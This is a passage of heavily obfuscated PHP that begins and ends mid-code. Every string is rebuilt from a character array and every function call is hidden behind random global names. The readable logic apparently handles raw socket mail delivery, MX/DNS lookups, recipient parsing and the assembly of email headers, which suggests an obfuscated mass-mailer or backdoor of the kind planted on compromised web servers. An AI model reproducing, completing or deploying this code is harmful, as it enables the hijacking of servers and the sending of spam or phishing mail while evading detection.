$iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[37].$r76[44].$r76[64].$r76[67].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[44].$r76[64].$r76[67]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); $iwule39[$xhovg5][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = TRUE; $iwule39[$xhovg5][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]] = 1; } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[44].$r76[64].$r76[67]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, "", FALSE); } break; } } } function rxrmp70($r76, &$iwule39, $xhovg5) { $kdidw81 = 0; $msnsv40 = ""; if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] == FALSE) { if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]]) != 0) { return TRUE; } return FALSE; } $jrnqk91 = $GLOBALS['yhcum29']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], 4086, $kdidw81, $msnsv40); if ($jrnqk91 == FALSE || $jrnqk91 == "") { if ($kdidw81 != 35 && $kdidw81 != 10035 && $kdidw81!= 11 && $kdidw81!= 10060) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $msnsv40, FALSE); return FALSE; } if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]]) != 0) { return TRUE; } return FALSE; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = $jrnqk91; return FALSE; } function prcux47($r76, &$iwule39, $xhovg5) { $kdidw81 = 0; $msnsv40 = ""; if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]]) == 0) { return TRUE; } $jrnqk91 = $GLOBALS['ibere91']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]], $kdidw81, $msnsv40); if ($jrnqk91 == FALSE) { if ($kdidw81 != 35 && $kdidw81 != 10035 && $kdidw81 != 11 && $kdidw81 != 10060) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $msnsv40, FALSE); } return FALSE; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]], $jrnqk91); if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]]) == 0) { return TRUE; } return FALSE; } function armtx32($r76, &$iwule39) { $bdhch16 = FALSE; if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) != $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { foreach($GLOBALS['vszxc90']($iwule39) as $xhovg5) { if ($iwule39[$xhovg5][$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] != TRUE) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = TRUE; $bdhch16 = TRUE; } } return $bdhch16; } $fwcsz21 = array(); foreach($GLOBALS['vszxc90']($iwule39) as $xhovg5) { if ($iwule39[$xhovg5][$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] != TRUE) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] == 0 || $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] == $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67])) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = TRUE; } else { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = FALSE; $fwcsz21[]=$iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]]; } $bdhch16 = TRUE; } } if ($GLOBALS['tlyiy12']($fwcsz21) == 0) { return $bdhch16; } $zkvhr54 = @$GLOBALS['qtgcq90']($fwcsz21, $kllzd89 = NULL, $ccvhx50 = NULL, 0); if ($zkvhr54 == FALSE || $zkvhr54 == 0) { return $bdhch16; } foreach($GLOBALS['vszxc90']($iwule39) as $xhovg5) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = FALSE; foreach($fwcsz21 as $xoloh2) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] == $xoloh2) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = TRUE; break; } } } return $bdhch16; } function hvcug13($r76, $hcobq94) { if ($GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]) && $GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[49].$r76[58].$r76[58].$r76[94].$r76[27].$r76[87]) && $GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[24].$r76[94].$r76[90].$r76[95]) && $GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[43].$r76[24].$r76[53].$r76[87].$r76[94])) { $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])); return TRUE; } if ($GLOBALS['yqqkt30']($r76[7].$r76[66].$r76[49].$r76[27].$r76[29].$r76[49].$r76[41].$r76[94].$r76[58])) { $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[0].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])); return TRUE; } if ($GLOBALS['yqqkt30']($r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[5].$r76[53].$r76[94].$r76[58].$r76[87])) { $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[67].$r76[68].$r76[79].$r76[4].$r76[11])); return TRUE; } $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[17])); return FALSE; } function npufi61($r76, $zlyfl67, $jabhi9, &$kumlm43) { $qivuk92 = array(); if (FALSE === @$GLOBALS['cyzbs96']($r76[16].$r76[83].$r76[86].$r76[77].$r76[97].$r76[51].$r76[62].$r76[97].$r76[83].$r76[86].$r76[77].$r76[97].$r76[51].$r76[62].$r76[97].$r76[83].$r76[86].$r76[80].$r76[12].$r76[83].$r76[86].$r76[80].$r76[62].$r76[97].$r76[62].$r76[51].$r76[97].$r76[16], $zlyfl67, $qivuk92) ) { return FALSE; } if (!isset($qivuk92) || $GLOBALS['tlyiy12']($qivuk92) != 5) { return FALSE; } $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]] = @$GLOBALS['bwpvf88']($GLOBALS['bdvxl14']($r76[51],"",$qivuk92[1])); $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]] = @$GLOBALS['bwpvf88']($GLOBALS['bdvxl14']($r76[51],"",$qivuk92[2])); $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]] = $GLOBALS['bdvxl14']($r76[51],"",$qivuk92[3]); $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]] = $GLOBALS['bdvxl14']($r76[51],"",$qivuk92[4]); if (!isset($kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]]) || $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]] == "") { return FALSE; } if (!isset($kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]]) || $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]] == "") { return FALSE; } if (isset($kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]]) && $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]] != "") { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]] = $r76[92].$kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]].$r76[92].$r76[39].$r76[2].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]].$r76[38]; } else { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]] = $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]]; } $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[7].$r76[24].$r76[49].$r76[78]] = $jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]]; if ($GLOBALS['cyzbs96']($r76[16].$r76[65].$r76[83].$r76[1].$r76[76].$r76[26].$r76[15].$r76[9].$r76[8].$r76[1].$r76[76].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[76].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[1].$r76[52].$r76[26].$r76[85].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[28].$r76[1].$r76[52].$r76[26].$r76[28].$r76[9].$r76[62].$r76[83].$r76[42].$r76[86].$r76[83].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[1].$r76[76].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[76].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[1].$r76[52].$r76[26].$r76[85].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[28].$r76[1].$r76[52].$r76[26].$r76[28].$r76[9].$r76[62].$r76[62].$r76[72].$r76[31].$r76[10].$r76[73].$r76[16], $jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]]) || @$GLOBALS['xizmx47']($r76[66].$r76[90].$r76[7].$r76[94].$r76[54].$r76[78].$r76[49].$r76[95].$r76[94])) { $kumlm43[$r76[61].$r76[54].$r76[7].$r76[7].$r76[7]] = FALSE; } else { $kumlm43[$r76[61].$r76[54].$r76[7].$r76[7].$r76[7]] = TRUE; } $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]] = $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58]].$r76[12].$jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]]; if (isset($jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]]) && $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]] != "") { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]] = $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]].$r76[39].$r76[2].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]].$r76[38]; } else { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]] = $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]]; } $kumlm43[$r76[66].$r76[54].$r76[78].$r76[20].$r76[36].$r76[49].$r76[66].$r76[87]] = $GLOBALS['stkuy98']($r76, $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]]); $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]], $jabhi9[$r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]]); $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[71].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]], $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]]); $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]], $jabhi9[$r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]]); $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[71].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]], $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]]); $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]] = @$GLOBALS['bdvxl14']($r76[59].$r76[11].$r76[4].$r76[64].$r76[71].$r76[54].$r76[79].$r76[56].$r76[59], $GLOBALS['igajs32']($r76, $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]]), $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]]); $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] = $r76[32].$r76[26].$r76[3].$r76[24].$r76[53].$r76[49].$r76[24].$r76[53].$r76[87].$r76[69].$r76[74].$r76[39].$r76[31].$r76[39].$r76[83].$r76[56].$r76[49].$r76[24].$r76[78].$r76[90].$r76[5].$r76[62].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[11].$r76[64].$r76[11].$r76[79].$r76[26].$r76[60].$r76[94].$r76[24].$r76[66].$r76[53].$r76[49].$r76[58].$r76[74].$r76[39].$r76[76].$r76[86].$r76[52].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[40].$r76[49].$r76[58].$r76[87].$r76[94].$r76[58].$r76[87].$r76[26].$r76[67].$r76[69].$r76[41].$r76[94].$r76[74].$r76[39].$r76[87].$r76[94].$r76[20].$r76[87].$r76[16].$r76[36].$r76[87].$r76[78].$r76[5].$r76[51].$r76[39].$r76[27].$r76[36].$r76[90].$r76[24].$r76[66].$r76[94].$r76[87].$r76[75].$r76[92].$r76[53].$r76[66].$r76[49].$r76[26].$r76[18].$r76[18].$r76[28].$r76[15].$r76[26].$r76[76].$r76[92].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[40].$r76[49].$r76[58].$r76[87].$r76[94].$r76[58].$r76[87].$r76[26].$r76[67].$r76[24].$r76[90].$r76[58].$r76[66].$r76[7].$r76[94].$r76[24].$r76[26].$r76[79].$r76[58].$r76[27].$r76[49].$r76[95].$r76[53].$r76[58].$r76[61].$r76[74].$r76[39].$r76[18].$r76[96].$r76[53].$r76[87].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]] = $r76[0].$r76[24].$r76[49].$r76[78].$r76[74].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]] .= $r76[68].$r76[94].$r76[41].$r76[5].$r76[69].$r76[26].$r76[67].$r76[49].$r76[74].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] = $r76[6].$r76[90].$r76[87].$r76[94].$r76[74].$r76[39] . @$GLOBALS['duiid33']($r76[6].$r76[33].$r76[39].$r76[47].$r76[39].$r76[11].$r76[39].$r76[34].$r76[39].$r76[48].$r76[74].$r76[53].$r76[74].$r76[66].$r76[39].$r76[17]).$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[11].$r76[94].$r76[66].$r76[66].$r76[90].$r76[61].$r76[94].$r76[26].$r76[64].$r76[6].$r76[74].$r76[39].$r76[2].$GLOBALS['laepm94']($r76[16].$r76[83].$r76[86].$r76[72].$r76[14].$r76[10].$r76[62].$r76[83].$r76[86].$r76[72].$r76[28].$r76[10].$r76[62].$r76[83].$r76[86].$r76[72].$r76[46].$r76[10].$r76[62].$r76[86].$r76[77].$r76[16], $r76[73].$r76[76].$r76[26].$r76[73].$r76[46].$r76[26].$r76[73].$r76[31], $GLOBALS['quzii24']($GLOBALS['kyioa8']())).$r76[12].$jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]].$r76[38].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[67].$r76[49].$r76[74].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[55].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87].$r76[74].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]]; return TRUE; } function vkaqq98($r76, $pfahk9) { $mlopr36 = array(); $vcnaa29 = array(); if ($GLOBALS['yqqkt30']($r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24])) { @$GLOBALS['grxdw62']($pfahk9, $mlopr36, $vcnaa29); } else { if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[17])) { return FALSE; } $zkvhr54 = $GLOBALS['nvuxa92']($r76, $pfahk9, $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32])); if ($zkvhr54 == FALSE || !isset($zkvhr54[$r76[90].$r76[58].$r76[66]])) { return FALSE; } foreach ($zkvhr54[$r76[90].$r76[58].$r76[66]] as $txows40) { if ($txows40[$r76[87].$r76[69].$r76[41].$r76[94]] == $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32])) { $mlopr36[] = $txows40[$r76[95].$r76[90].$r76[87].$r76[90]]; $vcnaa29[] = $txows40[$r76[41].$r76[24].$r76[94].$r76[7].$r76[94].$r76[24].$r76[94].$r76[58].$r76[27].$r76[94]]; } } } if ($GLOBALS['tlyiy12']($mlopr36) == 0) { return FALSE; } $wtqra76 = $GLOBALS['vszxc90']($vcnaa29, $GLOBALS['ysmvf63']($vcnaa29)); return $mlopr36[$wtqra76[0]]; } function xyhxn92($r76, &$jabhi9) { if ($GLOBALS['tlyiy12']($GLOBALS['vbhwy58']) < 2) { return FALSE; } $binbe57 = false; $xzovr93 = $ufhgw71 = ""; foreach ($GLOBALS['vszxc90']($GLOBALS['vbhwy58']) as $clhez9) { if ($clhez9[0] == $r76[5]) { $xzovr93 = $clhez9; } if ($clhez9[0] == $r76[95]) { $ufhgw71 = $clhez9; } if ($clhez9[0] == $r76[94]) { $binbe57 = true; } } if ($xzovr93 == "" || $ufhgw71 == "") { return FALSE; } $kuaid89 = $GLOBALS['wdbfr89']($r76, $xzovr93, $binbe57 ); $mkfpj46= $GLOBALS['wdbfr89']($r76, $ufhgw71, $binbe57); if ($kuaid89 == FALSE || $mkfpj46 == FALSE) { return FALSE; } $jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]] = @$GLOBALS['vxogc32']($r76[16].$r76[93].$r76[16], $kuaid89); $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58]] = $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]] = $jabhi9[$r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = $jabhi9[$r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = ""; $qivuk92 = array(); if (FALSE !== @$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[44].$r76[55].$r76[79].$r76[68].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[44].$r76[55].$r76[79].$r76[68].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78], $mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58]] = $qivuk92[1]; } if (FALSE !== @$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[56].$r76[4].$r76[11].$r76[79].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[56].$r76[4].$r76[11].$r76[79].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78], $mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]] = $qivuk92[1]; } if (FALSE !== @$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[55].$r76[44].$r76[50].$r76[81].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[55].$r76[44].$r76[50].$r76[81].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78], $mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = $qivuk92[1]; } if (FALSE !== @$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[55].$r76[50].$r76[17].$r76[6].$r76[34].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[55].$r76[50].$r76[17].$r76[6].$r76[34].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78],$mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = $qivuk92[1]; } $jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]] = @$GLOBALS['laepm94']($r76[16].$r76[65].$r76[83].$r76[43].$r76[43].$r76[43].$r76[8].$r76[7].$r76[87].$r76[41].$r76[62].$r76[42].$r76[86].$r76[16].$r76[53], '', 